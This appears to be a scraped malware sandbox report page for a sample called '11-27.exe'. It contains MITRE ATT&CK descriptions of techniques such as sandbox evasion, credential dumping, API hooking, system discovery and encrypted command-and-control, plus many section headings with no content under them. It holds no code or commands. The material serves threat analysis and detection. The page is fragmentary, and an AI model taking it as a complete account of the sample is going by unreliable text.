Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 11-27.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre